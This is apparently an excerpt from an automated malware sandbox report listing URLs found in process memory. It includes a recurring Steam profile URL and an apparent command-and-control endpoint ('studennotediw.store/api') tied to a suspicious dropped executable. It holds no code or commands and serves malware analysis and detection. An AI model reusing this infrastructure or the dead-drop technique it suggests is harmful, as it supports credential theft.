Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3129585316.000001708BEE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3321587430.0000017084F3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.00000170844A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3129585316.000001708BE81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.00000170844CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userdiscoverystream.rec.impressions
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userdiscoverystream.rec.impressions__MSG_searchUrlGetParams__
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084AE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B8F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B09000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B06000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084AE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A41000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B8F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001137000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com
Source: 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032933485.0000000001619000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: file.exe, 00000000.00000003.2142550438.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134448591.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000A83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134302834.0000000000A83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/=
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/icro
Source: 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F
Source: file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001137000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: 26e226f915.exe, 0000000B.00000002.2904278824.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/nnzF
Source: file.exe, 00000000.00000003.2142550438.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134448591.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000A83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134302834.0000000000A83000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000002.2904278824.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032933485.0000000001619000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: 26e226f915.exe, 0000000B.00000003.2901522746.0000000001152000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000002.2904685604.0000000001153000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001150000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900&&MR(
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: 26e226f915.exe, 0000000D.00000003.3032933485.0000000001619000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900_
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: file.exe, 00000000.00000003.2134302834.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000002.2904278824.00000000010FE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: 26e226f915.exe, 0000000D.00000003.3032933485.0000000001605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com:443/profiles/765611997243319003J
Source: file.exe, 00000000.00000003.2142391592.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142550438.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.stea
Source: 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: file.exe, 00000000.00000003.2134302834.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134302834.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134448591.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000002.2904278824.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: file.exe, 00000000.00000003.2134302834.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134448591.0000000000A9F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000002.2904278824.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cbcfeb0e5371aba2
Source: 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001137000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 26e226f915.exe, 0000000B.00000003.2901522746.0000000001152000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000002.2904685604.0000000001153000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001150000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store/api
Source: file.exe, 00000000.00000003.2134302834.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store:443/api
Source: 26e226f915.exe, 0000000D.00000003.3032933485.0000000001605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://studennotediw.store:443/apiVJr
Source: firefox.exe, 0000001B.00000002.3306081297.0000017084541000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: 26e226f915.exe, 0000000D.00000003.3094784478.0000000006106000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3204452985.0000000005C85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/firefox-crashes-troubleshoot-prevent-and-get-helpError
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3208884492.00000170837CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3217108520.00000170837CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settingspromiseLangPacksUpdated
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3271364302.0000017080000000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causes
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/warning-unresponsive-script#w_other-causesCaptiveProtalDetector
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3271364302.0000017080000000.00000002.00000001.00040000.0000001C.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translation
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/website-translationSetting
Source: 26e226f915.exe, 0000000D.00000003.3094784478.0000000006106000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3204452985.0000000005C85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 0000001B.00000003.3221206285.000001708BF77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tc39.github.io/ecma262/#sec-typeof-operator
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B8F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 0000001B.00000003.3221206285.000001708BF77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wicg.github.io/construct-stylesheets/#using-constructed-stylesheets).
Source: firefox.exe, 0000001B.00000003.3142865401.0000017084B64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3302672534.00000170841ED000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 0000001B.00000003.3142865401.0000017084B64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/_validateBranches/schema
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
